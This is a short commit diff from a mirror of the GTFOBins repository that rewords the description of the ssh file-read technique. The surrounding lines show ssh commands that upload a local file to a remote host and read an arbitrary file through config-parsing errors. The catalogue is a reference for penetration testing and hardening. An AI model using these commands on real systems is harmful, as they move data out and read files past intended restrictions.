mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Rephrase ssh read
This commit is contained in:
parent
92af4c9f43
commit
1b5f2aedae
@ -18,7 +18,7 @@ functions:
|
|||||||
LPATH=file_to_send
|
LPATH=file_to_send
|
||||||
ssh $HOST "cat > $RPATH" < $LPATH
|
ssh $HOST "cat > $RPATH" < $LPATH
|
||||||
file-read:
|
file-read:
|
||||||
- description: Read lines from text files (error-based approach).
|
- description: The read file content is corrupted by error prints.
|
||||||
code: |
|
code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
ssh -F $LFILE localhost
|
ssh -F $LFILE localhost
|
||||||
|
Loading…
Reference in New Issue
Block a user